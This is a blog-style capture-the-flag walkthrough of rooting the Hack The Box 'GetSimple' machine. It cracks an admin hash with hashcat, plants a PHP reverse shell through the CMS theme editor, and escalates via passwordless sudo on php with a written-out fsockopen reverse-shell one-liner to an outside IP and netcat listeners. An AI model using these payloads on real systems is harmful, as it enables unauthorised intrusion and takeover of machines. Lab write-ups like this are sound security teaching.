R.A.V.E.N. Exploit Walkthrough: Rooting GetSimpleCMS via Theme Template Injection

Brad HarrisBrad Harris
2 min read

Welcome to another breakdown in the R.A.V.E.N. series — a branded, modular approach to privilege escalation. Today, we're dissecting a black box engagement on HTB’s “GetSimple” machine, where remote exploitation leads to root access through theme template manipulation in a flat-file CMS.


Reconnaissance: Mapping the Terrain

Our initial scans painted a predictable picture:

  • nmap flagged open ports: 22 (OpenSSH) and 80 (Apache httpd).

  • nikto discovered /admin.xml containing a hash nested inside /data/users/.

  • gobuster confirmed relevant directories: /admin/, /data/.

  • curl scraping gave no extra intel in the source code.

Credentials Unearthed

Extracted hash:

d033e22ae348aeb5660fc2140aec35850c4da997

Cracked with Hashcat using rockyou:

echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > hash.txt
hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Result: admin:admin

Initial Foothold: Bypassing Upload Restrictions

Login access to /admin yielded no direct file upload functionality — and GetSimpleCMS refused to parse PHP within page content. Enter the workaround: using the Theme Editor.

  • Injected PentestMonkey's PHP reverse shell into a .php file under the active theme.

  • With a netcat listener (nc -lnvp 5555) running, a quick page refresh dropped us into the box.

Shell Upgrade

TTY was unstable post-access, so we upgraded it:

python3 -c 'import pty; pty.spawn("/bin/bash")'

And just like that — user.txt found in /home/<user>.

Privilege Escalation: The Hidden Misconfig

Standard enumeration with LinEnum revealed a gem:

User can sudo /usr/bin/php without password

Root payload:

sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.1",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

Reverse shell listener:

nc -lnvp 4444

And boom — root.txt retrieved.

Key Takeaways

  • Flat-file CMSs like GetSimple don’t rely on databases, which shifts your attack surface.

  • No file uploads? Try theme injection.

  • Don’t ignore hashed credentials in public-facing XML.

  • Sudo misconfigurations can be gold — run sudo -l religiously.


3
Subscribe to my newsletter

Read articles from Brad Harris directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Brad Harris
Brad Harris

I am extremely passionate about staying updated and enhancing my skills to safeguard any organizations' assets in the dynamic cloud computing environment.